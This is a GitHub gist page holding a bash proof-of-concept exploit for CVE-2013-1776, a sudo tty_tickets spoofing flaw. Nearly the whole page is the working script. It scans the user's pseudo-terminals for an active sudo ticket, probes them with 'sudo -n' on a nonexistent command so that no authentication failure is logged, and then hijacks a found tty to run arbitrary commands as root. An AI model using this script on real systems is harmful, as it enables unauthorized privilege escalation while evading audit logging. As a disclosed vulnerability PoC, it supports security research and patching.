Created
March 11, 2013 18:06
-
-
Save ryancdotorg/5136278 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # PoC tty_tickets spoofing exploit by Ryan Castellucci | |
| # Originally written October 2012, see CVE-2013-1776 | |
| # This does not implement using setsid to cause fallback | |
| DUMMY=/does/not/exist/$RANDOM/$RANDOM/$RANDOM/$RANDOM | |
| WAIT_LOOP=0 | |
| # Usage ./sudosudo.sh command [args] | |
| while true | |
| do | |
| # Find all ttys that the current user owns | |
| for t in `find /dev/pts -user $USER`; do | |
| # The -n flag avoids auth failures which would be logged | |
| # When sudo -n is run and would allow running a command without a | |
| # password, it will exit without logging if the command to run does | |
| # not exist | |
| sudo -n $DUMMY <$t 2>&1 | grep $DUMMY &>/dev/null | |
| if [ $? -eq 0 ] | |
| then | |
| echo active sudo ticket on $t, spoofing | |
| exec <$t | |
| exec sudo -n "$@" | |
| exit 255 | |
| fi | |
| done | |
| if [ $WAIT_LOOP -eq 0 ] | |
| then | |
| echo no sudo tickets found, waiting for one | |
| WAIT_LOOP=1 | |
| fi | |
| sleep 60 | |
| done |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment